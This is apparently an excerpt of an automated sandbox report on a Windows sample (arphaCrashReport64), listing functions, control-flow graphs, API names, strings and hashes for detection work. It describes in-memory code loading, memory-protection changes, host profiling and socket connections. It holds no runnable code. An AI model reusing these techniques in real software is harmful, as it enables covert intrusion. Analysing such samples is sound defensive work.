                                            • Opcode Fuzzy Hash: 365d0e112e7cdaa6982ef6da38e7ea94118737f30474664e1cd6f0c1e0a991be
                                            • Instruction Fuzzy Hash: 1671B626224E9085EB61CB15F85879EB76AF7887C4F415116FA9E43B6CDF3CC448CB48
                                            Function 0000024B64584530 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 145librarymemoryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Handle$Close$AddressProcProtectVirtual$CreateLibraryLoadModuleObjectSingleThreadWaitlstrcpy
                                            • String ID: Mov$NtTerminateThread$NtTraceEvent$driver$ntdll.dll$run
                                            • API String ID: 2320672033-2918648053
                                            • Opcode ID: 7b1ee9c18eb7b140bc95ef8b353150d332ff35e3fc96c6eef656a7be9ee323cc
                                            • Instruction ID: 222eb1b357f4577314e2e49a8353c8a761fa697f95e2657736ca6cf21ee5df12
                                            • Opcode Fuzzy Hash: 7b1ee9c18eb7b140bc95ef8b353150d332ff35e3fc96c6eef656a7be9ee323cc
                                            • Instruction Fuzzy Hash: D761B531604E8185EB53DB21F85C39A33AAF799B84F864116EA4E47B9DEF3CC048C709
                                            Function 00007FFDFB8B63F8 Relevance: 28.9, APIs: 19, Instructions: 377COMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 279 7ffdfb8b63f8-7ffdfb8b644e 280 7ffdfb8b649f-7ffdfb8b64a6 279->280 281 7ffdfb8b6450-7ffdfb8b6472 LCMapStringW 279->281 282 7ffdfb8b64a8-7ffdfb8b64ab 280->282 283 7ffdfb8b64dd-7ffdfb8b64e0 280->283 284 7ffdfb8b6480-7ffdfb8b6494 GetLastError 281->284 285 7ffdfb8b6474-7ffdfb8b647e 281->285 286 7ffdfb8b64ae-7ffdfb8b64b4 282->286 287 7ffdfb8b64e6-7ffdfb8b64e9 283->287 288 7ffdfb8b6742-7ffdfb8b674b 283->288 289 7ffdfb8b649b 284->289 285->289 292 7ffdfb8b64b6-7ffdfb8b64bb 286->292 293 7ffdfb8b64c0-7ffdfb8b64cb 286->293 287->288 294 7ffdfb8b64ef-7ffdfb8b64f2 287->294 290 7ffdfb8b6758-7ffdfb8b6760 288->290 291 7ffdfb8b674d-7ffdfb8b6754 288->291 289->280 295 7ffdfb8b6768-7ffdfb8b6776 call 7ffdfb8b6d80 290->295 296 7ffdfb8b6762-7ffdfb8b6765 290->296 291->290 292->286 297 7ffdfb8b64bd 292->297 298 7ffdfb8b64d7-7ffdfb8b64da 293->298 299 7ffdfb8b64cd-7ffdfb8b64d5 293->299 300 7ffdfb8b6778-7ffdfb8b677a 294->300 301 7ffdfb8b64f8-7ffdfb8b6504 294->301 295->300 310 7ffdfb8b677f-7ffdfb8b6789 295->310 296->295 297->293 298->283 299->283 303 7ffdfb8b690f-7ffdfb8b6934 call 7ffdfb8b15b0 300->303 304 7ffdfb8b6506-7ffdfb8b6509 301->304 305 7ffdfb8b650d-7ffdfb8b6536 MultiByteToWideChar 301->305 304->305 305->300 308 7ffdfb8b653c-7ffdfb8b6552 305->308 311 7ffdfb8b65af-7ffdfb8b65b2 308->311 312 7ffdfb8b6554-7ffdfb8b6561 308->312 314 7ffdfb8b68cb-7ffdfb8b68ea LCMapStringA 310->314 315 7ffdfb8b678f-7ffdfb8b67ad call 7ffdfb8b6dd4 310->315 311->300 316 7ffdfb8b65b8-7ffdfb8b65dc MultiByteToWideChar 311->316 312->311 313 7ffdfb8b6563-7ffdfb8b656b 312->313 317 7ffdfb8b659b-7ffdfb8b65a6 call 7ffdfb8b1d34 313->317 318 7ffdfb8b656d-7ffdfb8b6574 313->318 320 7ffdfb8b68ec 314->320 315->300 335 7ffdfb8b67af-7ffdfb8b67d5 LCMapStringA 315->335 321 7ffdfb8b672d-7ffdfb8b6734 316->321 322 7ffdfb8b65e2-7ffdfb8b6606 LCMapStringW 316->322 317->311 345 7ffdfb8b65a8 317->345 323 7ffdfb8b6576 318->323 324 7ffdfb8b6579-7ffdfb8b658d call 7ffdfb8b8da0 318->324 327 7ffdfb8b68ee-7ffdfb8b68f1 320->327 328 7ffdfb8b6736 call 7ffdfb8b1ea8 321->328 329 7ffdfb8b673b-7ffdfb8b673d 321->329 322->321 330 7ffdfb8b660c-7ffdfb8b6615 322->330 323->324 324->300 353 7ffdfb8b6593-7ffdfb8b6599 324->353 336 7ffdfb8b68fb-7ffdfb8b68fe 327->336 337 7ffdfb8b68f3-7ffdfb8b68f6 call 7ffdfb8b1ea8 327->337 328->329 329->303 331 7ffdfb8b6617-7ffdfb8b6620 330->331 332 7ffdfb8b6652-7ffdfb8b6655 330->332 331->321 341 7ffdfb8b6626-7ffdfb8b6628 331->341 342 7ffdfb8b66b7 332->342 343 7ffdfb8b6657-7ffdfb8b6664 332->343 346 7ffdfb8b67d7-7ffdfb8b67d9 335->346 347 7ffdfb8b67de-7ffdfb8b67e7 335->347 339 7ffdfb8b6900-7ffdfb8b6903 336->339 340 7ffdfb8b690d 336->340 337->336 339->340 349 7ffdfb8b6905-7ffdfb8b6908 call 7ffdfb8b1ea8 339->349 340->303 341->321 350 7ffdfb8b662e-7ffdfb8b664d LCMapStringW 341->350 351 7ffdfb8b66ba-7ffdfb8b66bd 342->351 343->342 352 7ffdfb8b6666-7ffdfb8b666e 343->352 354 7ffdfb8b65ab 345->354 346->327 355 7ffdfb8b684b-7ffdfb8b684e 347->355 356 7ffdfb8b67e9-7ffdfb8b67f0 347->356 349->340 350->321 351->321 359 7ffdfb8b66bf-7ffdfb8b66de LCMapStringW 351->359 360 7ffdfb8b669a-7ffdfb8b66a8 call 7ffdfb8b1d34 352->360 361 7ffdfb8b6670-7ffdfb8b6677 352->361 353->354 354->311 362 7ffdfb8b6850-7ffdfb8b6852 355->362 363 7ffdfb8b6854-7ffdfb8b6887 call 7ffdfb8b1f00 LCMapStringA 355->363 356->355 357 7ffdfb8b67f2-7ffdfb8b67fd 356->357 365 7ffdfb8b67ff-7ffdfb8b6806 357->365 366 7ffdfb8b6833-7ffdfb8b683e call 7ffdfb8b1d34 357->366 367 7ffdfb8b671f-7ffdfb8b6726 359->367 368 7ffdfb8b66e0-7ffdfb8b66fa 359->368 388 7ffdfb8b66aa 360->388 389 7ffdfb8b66b1-7ffdfb8b66b5 360->389 369 7ffdfb8b667c-7ffdfb8b6690 call 7ffdfb8b8da0 361->369 370 7ffdfb8b6679 361->370 362->346 381 7ffdfb8b6889-7ffdfb8b688b 363->381 382 7ffdfb8b688d-7ffdfb8b68b8 call 7ffdfb8b6dd4 363->382 373 7ffdfb8b6808 365->373 374 7ffdfb8b6812-7ffdfb8b6829 call 7ffdfb8b8da0 365->374 394 7ffdfb8b6847 366->394 395 7ffdfb8b6840 366->395 367->321 379 7ffdfb8b6728 call 7ffdfb8b1ea8 367->379 375 7ffdfb8b6707-7ffdfb8b670f 368->375 376 7ffdfb8b66fc-7ffdfb8b6705 368->376 369->389 396 7ffdfb8b6692-7ffdfb8b6698 369->396 370->369 373->374 374->362 398 7ffdfb8b682b-7ffdfb8b6831 374->398 384 7ffdfb8b6714-7ffdfb8b671d WideCharToMultiByte 375->384 376->384 379->321 391 7ffdfb8b68bb-7ffdfb8b68c2 381->391 382->391 384->367 390 7ffdfb8b66ad 388->390 389->351 390->389 391->320 399 7ffdfb8b68c4-7ffdfb8b68c9 call 7ffdfb8b1ea8 391->399 394->355 400 7ffdfb8b6843 395->400 396->390 398->400 399->320 400->394
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
                                            • String ID:
                                            • API String ID: 1837315383-0
                                            • Opcode ID: 400ea71fb48555d96f43ecf733a5580efca3da6b475d4926e1cb498674c2e82d
                                            • Instruction ID: 55a56ff4306fcfb79fe3935e10920a37e608b93038bef3dc2cd108898a34e7cb
                                            • Opcode Fuzzy Hash: 400ea71fb48555d96f43ecf733a5580efca3da6b475d4926e1cb498674c2e82d
                                            • Instruction Fuzzy Hash: 57F1C732B2A64386E7209F34D820979B791FB84798F548235DA6D57BECCF3CE5408B80
                                            Function 0000024B626A0C79 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 249networkmemorynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2903813553.0000024B626A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000024B626A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b626a0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtualrecv$Startupclosesocketconnectsendsocket
                                            • String ID: @
                                            • API String ID: 4278212906-2766056989
                                            • Opcode ID: 56a3fed7da5864b94984c1579b8c5a1be58e3b0788e64a60c5c1e2669a7318f1
                                            • Instruction ID: 9c34b166ded27d4a9a2fd77d810c44d14f792a3023d87864c044fe4e86adc07e
                                            • Opcode Fuzzy Hash: 56a3fed7da5864b94984c1579b8c5a1be58e3b0788e64a60c5c1e2669a7318f1
                                            • Instruction Fuzzy Hash: 5271D130618A484FEB6DEF2888897B9B7E1FB99304F10466DD48ECB296DF31D5468781
                                            Function 0000024B64581E80 Relevance: 13.7, APIs: 9, Instructions: 220memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 463 24b64581e80-24b64581ead 464 24b64581eb3-24b64581ebe 463->464 465 24b6458219d-24b645821ba 463->465 466 24b64581ec0 464->466 467 24b64581ec3-24b64581eca 466->467 467->465 468 24b64581ed0-24b64581ee3 SleepEx 467->468 468->467 469 24b64581ee5-24b64581ef1 GetCurrentThreadId 468->469 470 24b64581ef3 469->470 471 24b64581f1c-24b64581f2e 469->471 472 24b64581f00-24b64581f0e 470->472 473 24b64581f35-24b64581f38 471->473 474 24b64581f30-24b64581f33 471->474 472->472 475 24b64581f10-24b64581f16 472->475 476 24b64581f3b-24b64581f41 473->476 474->476 475->471 477 24b64581f43-24b64581f7d call 24b645a2478 VirtualAlloc 476->477 478 24b64581fbd-24b64581fd0 476->478 486 24b64581f84-24b64581f87 477->486 487 24b64581f7f-24b64581f82 477->487 479 24b64581fd7-24b64581fda 478->479 480 24b64581fd2-24b64581fd5 478->480 482 24b64581fdd-24b64581fe3 479->482 480->482 484 24b64581fe5-24b6458201f call 24b645a2478 VirtualAlloc 482->484 485 24b6458205f-24b6458207e 482->485 497 24b64582026-24b64582029 484->497 498 24b64582021-24b64582024 484->498 488 24b64582085-24b64582088 485->488 489 24b64582080-24b64582083 485->489 491 24b64581f89-24b64581f9d call 24b64592c40 486->491 487->491 492 24b6458208b-24b64582090 488->492 489->492 500 24b64581fad-24b64581fb9 491->500 501 24b64581f9f-24b64581fa7 VirtualFree 491->501 495 24b6458210c-24b64582142 492->495 496 24b64582092-24b645820cc call 24b645a2478 VirtualAlloc 492->496 504 24b64582144-24b64582147 495->504 505 24b64582149-24b6458214d 495->505 510 24b645820d3-24b645820d6 496->510 511 24b645820ce-24b645820d1 496->511 503 24b6458202b-24b6458203f call 24b64592c40 497->503 498->503 500->478 501->500 515 24b6458204f-24b6458205b 503->515 516 24b64582041-24b64582049 VirtualFree 503->516 506 24b64582151-24b6458216e call 24b64582900 call 24b64581370 504->506 505->506 519 24b64582173-24b6458217f GetCurrentThreadId 506->519 514 24b645820d8-24b645820ec call 24b64592c40 510->514 511->514 523 24b645820fc-24b64582108 514->523 524 24b645820ee-24b645820f6 VirtualFree 514->524 515->485 516->515 521 24b64582190-24b64582197 519->521 522 24b64582181-24b64582187 519->522 521->465 521->466 522->521 525 24b64582189 522->525 523->495 524->523 525->521
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree$CurrentThread$Sleep
                                            • String ID:
                                            • API String ID: 2090942847-0
                                            • Opcode ID: 0efdc29df09f4a7188a29b8634807d3c226196f672a366a7f8e6bc1b669edc25
                                            • Instruction ID: d08eb6281868b17c56266843af5f11a80cbfce40fbb03d23a63f750af49990a7
                                            • Opcode Fuzzy Hash: 0efdc29df09f4a7188a29b8634807d3c226196f672a366a7f8e6bc1b669edc25
                                            • Instruction Fuzzy Hash: 3291C032300B909BE71E8B25D2483E97BAAF745784F118129EB4693B99DF38E4B5C744
                                            Function 0000024B64290020 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 457memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID: @$XVXT
                                            • API String ID: 2167126740-4063696373
                                            • Opcode ID: 6b8ca969d0edacce73b4e7c308406ec1214b92f2b93040ed9f05acbd5687362f
                                            • Instruction ID: 42257226635915d877006e339d980ed99df32b7b6feb7b261073bbae34d7408f
                                            • Opcode Fuzzy Hash: 6b8ca969d0edacce73b4e7c308406ec1214b92f2b93040ed9f05acbd5687362f
                                            • Instruction Fuzzy Hash: F0D1A230614E0D8FDF59DF19C888BB9B7E5FB5A301F25416DE54AC718ADB30E8428B48
                                            Function 0000024B64290091 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 296memorylibrarynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AllocateLoadMemoryVirtual
                                            • String ID: @
                                            • API String ID: 582251630-2766056989
                                            • Opcode ID: c2f7a8c889b9dcb2227e988a3cb537535b5236b3493b5ac8ebfb49acde9b56f0
                                            • Instruction ID: 6dcf6dd4ede1b935c418ccd82b3610f637c793855478df4277a16f3ace3efd7b
                                            • Opcode Fuzzy Hash: c2f7a8c889b9dcb2227e988a3cb537535b5236b3493b5ac8ebfb49acde9b56f0
                                            • Instruction Fuzzy Hash: 1791C030624E0D8FDF19DF59C888BB8B7E5FB59301F25416DE94AC328ADB30D842CA48
                                            Function 00007FFDFB8B1050 Relevance: 82.4, APIs: 8, Strings: 39, Instructions: 139libraryloaderregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressProc$CloseOpenProtectValueVirtual
                                            • String ID: C$G$K$P$R$R$SOFTWARE$V$V$W$a$a$c$e$e$e$e$e$e$e$g$g$i$l$l$l$lpData$o$o$r$r$s$t$t$t$t$u$u$y
                                            • API String ID: 2887040864-1668064147
                                            • Opcode ID: 66db1752739624b81b7b7db69dcd4bd46bfa9ff92f5b6477fe3715e5f2e82e2d
                                            • Instruction ID: ded463f5edc5eb8edbe87c77946bd131aa435414011328caeed62ffbd07b4fca
                                            • Opcode Fuzzy Hash: 66db1752739624b81b7b7db69dcd4bd46bfa9ff92f5b6477fe3715e5f2e82e2d
                                            • Instruction Fuzzy Hash: 51813B2261CAC1C9E721C728E45875BBF91E7D6748F444069D2DC47AAACFBEC148CF26
                                            Function 0000024B64583560 Relevance: 43.9, APIs: 11, Strings: 14, Instructions: 188librarystringprocessCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Name$Computer$Currentwsprintf$AddressCreateFileLibraryLoadModuleProcProcessProfileSnapshotToolhelp32User_localtime64lstrcatlstrcpylstrlen
                                            • String ID: %d-%d-%d %d:%d$.dll$2$2$Adva$GetU$Group$Remark$Time$ameA$driver$pi32$run$serN
                                            • API String ID: 2203227563-3218832578
                                            • Opcode ID: 4c9df6ceb10faf31e691ca73e19ae76b27f32ce6c5577c60513530c26abd7d4c
                                            • Instruction ID: bcb7d374f13d5e38b1ea3f44489a7b35a5e579f510b413fce1b63f2c2002273e
                                            • Opcode Fuzzy Hash: 4c9df6ceb10faf31e691ca73e19ae76b27f32ce6c5577c60513530c26abd7d4c
                                            • Instruction Fuzzy Hash: 6591B132201AC08AE722DF34E8583DD77A6F7447A4F814216EB5947AEEDF78C649C704
                                            Function 0000024B64581BF0 Relevance: 19.7, APIs: 13, Instructions: 152networktimeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: setsockopt$EventIoctlResetTimeconnectgethostbynamegetsocknamehtonsinet_ntopsockettime
                                            • String ID:
                                            • API String ID: 4102826399-0
                                            • Opcode ID: 69823b34bc752394f411954f9e383b6d2b1dd5977c59d891b4d8328fbe2701bc
                                            • Instruction ID: e60e4bb6d20959f92c99b3cb804fdd0f5898906d6bad86b5f33876084d95264e
                                            • Opcode Fuzzy Hash: 69823b34bc752394f411954f9e383b6d2b1dd5977c59d891b4d8328fbe2701bc
                                            • Instruction Fuzzy Hash: 8D719B72700A81AAE721CF65E4083DD37BAF748798F004226EF5957BA8DF38C169C748
                                            Function 0000024B64584430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Message$ClassCreateDispatchHandleModuleRegisterTranslateWindow
                                            • String ID: QjNy1jwRYuH6aNtMf3Jz
                                            • API String ID: 3848795541-3621823610
                                            • Opcode ID: 3406c9ca98162bfd763306c4c3a91e589ec25171c65301aba56c24f70cb98ac9
                                            • Instruction ID: 0161df6b9a73fd94e56e6e41c2a1e3a41ae793b5af040ae3d1f187c4913eb9e0
                                            • Opcode Fuzzy Hash: 3406c9ca98162bfd763306c4c3a91e589ec25171c65301aba56c24f70cb98ac9
                                            • Instruction Fuzzy Hash: 8A219031614ED182EB618B64F84875E77AAF785718F914216E6AD43AE8EF3CC14DCB04
                                            Function 0000024B645821C0 Relevance: 13.6, APIs: 9, Instructions: 97networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$CancelEventclosesocketrecvselectsetsockopt
                                            • String ID:
                                            • API String ID: 2233327707-0
                                            • Opcode ID: a05aeac41a3b76157148e5e7acf1457028f623d998fb654da6be27c4cb197c78
                                            • Instruction ID: 79293cc658f34044accd154e6b6fda333e72c9d0553b76b8dc9bd8dfd61eb50b
                                            • Opcode Fuzzy Hash: a05aeac41a3b76157148e5e7acf1457028f623d998fb654da6be27c4cb197c78
                                            • Instruction Fuzzy Hash: C341A432204ED085F7629F24E4483AD3BAAF785B94F560126EB9A47BDDCF38C484C709
                                            Function 00007FF6E2D5E8B0 Relevance: 13.6, APIs: 9, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904633402.00007FF6E2D51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6E2D50000, based on PE: true
                                            • Associated: 00000002.00000002.2904616051.00007FF6E2D50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904656659.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904680982.00007FF6E2D82000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904701121.00007FF6E2D85000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ff6e2d50000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: __scrt_fastfail__scrt_is_nonwritable_in_current_image$__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                            • String ID:
                                            • API String ID: 1011152198-0
                                            • Opcode ID: e49450ee6f6a2700efc2b99d1c8661abeac7e54670bb419982dbb3fd25f039fb
                                            • Instruction ID: 046c7ef3ab65cbd03d7e190dd43e6e1b83ab17b8e0067929901d54769eb0a68a
                                            • Opcode Fuzzy Hash: e49450ee6f6a2700efc2b99d1c8661abeac7e54670bb419982dbb3fd25f039fb
                                            • Instruction Fuzzy Hash: 98313923E9C24285FA54BB2594653B92393DF4134CF444235E78DCB2D3DEEEA844867B
                                            Function 00007FFDFB8B18E0 Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 620 7ffdfb8b18e0-7ffdfb8b18ec 621 7ffdfb8b196d-7ffdfb8b196f 620->621 622 7ffdfb8b18ee-7ffdfb8b18f7 call 7ffdfb8b3b20 620->622 624 7ffdfb8b19aa-7ffdfb8b19ad 621->624 625 7ffdfb8b1971-7ffdfb8b1979 621->625 627 7ffdfb8b18f9-7ffdfb8b18fb 622->627 632 7ffdfb8b1900-7ffdfb8b1907 call 7ffdfb8b2be0 622->632 629 7ffdfb8b1a05-7ffdfb8b1a08 624->629 630 7ffdfb8b19af-7ffdfb8b19be call 7ffdfb8b28e0 call 7ffdfb8b2cd0 624->630 625->627 628 7ffdfb8b197f-7ffdfb8b198d 625->628 633 7ffdfb8b1a16-7ffdfb8b1a1b 627->633 634 7ffdfb8b198f call 7ffdfb8b3130 628->634 635 7ffdfb8b1994-7ffdfb8b1997 628->635 636 7ffdfb8b1a0a-7ffdfb8b1a0c call 7ffdfb8b2ba0 629->636 637 7ffdfb8b1a11 629->637 646 7ffdfb8b19c3-7ffdfb8b19c9 630->646 647 7ffdfb8b1909-7ffdfb8b190e call 7ffdfb8b3b6c 632->647 648 7ffdfb8b1910-7ffdfb8b1935 call 7ffdfb8b3ab0 GetCommandLineA call 7ffdfb8b38fc call 7ffdfb8b31a8 632->648 634->635 635->637 641 7ffdfb8b1999-7ffdfb8b19a8 call 7ffdfb8b3498 call 7ffdfb8b28e4 call 7ffdfb8b3b6c 635->641 636->637 637->633 641->637 646->627 650 7ffdfb8b19cf-7ffdfb8b19e3 FlsSetValue 646->650 647->627 669 7ffdfb8b1937-7ffdfb8b193c call 7ffdfb8b28e4 648->669 670 7ffdfb8b193e call 7ffdfb8b3804 648->670 654 7ffdfb8b19e5-7ffdfb8b19f9 call 7ffdfb8b290c GetCurrentThreadId 650->654 655 7ffdfb8b19fb-7ffdfb8b1a00 call 7ffdfb8b1ea8 650->655 654->637 655->627 669->647 674 7ffdfb8b1943-7ffdfb8b1945 670->674 675 7ffdfb8b1947-7ffdfb8b194e call 7ffdfb8b3504 674->675 676 7ffdfb8b1966-7ffdfb8b196b call 7ffdfb8b3498 674->676 675->676 681 7ffdfb8b1950-7ffdfb8b1959 call 7ffdfb8b2ee8 675->681 676->669 681->676 684 7ffdfb8b195b-7ffdfb8b1961 681->684 684->637
                                            APIs
                                              • Part of subcall function 00007FFDFB8B3B20: HeapCreate.KERNELBASE(?,?,?,?,00007FFDFB8B18F5), ref: 00007FFDFB8B3B32
                                              • Part of subcall function 00007FFDFB8B3B20: HeapSetInformation.KERNEL32 ref: 00007FFDFB8B3B5C
                                            • _RTC_Initialize.LIBCMT ref: 00007FFDFB8B1910
                                            • GetCommandLineA.KERNEL32 ref: 00007FFDFB8B1915
                                              • Part of subcall function 00007FFDFB8B38FC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFDFB8B1927), ref: 00007FFDFB8B392B
                                              • Part of subcall function 00007FFDFB8B38FC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFDFB8B1927), ref: 00007FFDFB8B396B
                                              • Part of subcall function 00007FFDFB8B31A8: GetStartupInfoA.KERNEL32 ref: 00007FFDFB8B31CD
                                            • __setargv.LIBCMT ref: 00007FFDFB8B193E
                                            • _cinit.LIBCMT ref: 00007FFDFB8B1952
                                              • Part of subcall function 00007FFDFB8B28E4: FlsFree.KERNEL32(?,?,?,?,00007FFDFB8B19A3), ref: 00007FFDFB8B28F3
                                              • Part of subcall function 00007FFDFB8B28E4: DeleteCriticalSection.KERNEL32(?,?,?,000005AA,?,?,?,?,?,?,?,?,?,00007FFDFB8B19A3), ref: 00007FFDFB8B430E
                                              • Part of subcall function 00007FFDFB8B28E4: free.LIBCMT ref: 00007FFDFB8B4317
                                              • Part of subcall function 00007FFDFB8B28E4: DeleteCriticalSection.KERNEL32(?,?,?,000005AA,?,?,?,?,?,?,?,?,?,00007FFDFB8B19A3), ref: 00007FFDFB8B4337
                                              • Part of subcall function 00007FFDFB8B2CD0: Sleep.KERNEL32(?,?,?,00007FFDFB8B29F3,?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD), ref: 00007FFDFB8B2D15
                                            • FlsSetValue.KERNEL32 ref: 00007FFDFB8B19D8
                                            • GetCurrentThreadId.KERNEL32 ref: 00007FFDFB8B19EC
                                            • free.LIBCMT ref: 00007FFDFB8B19FB
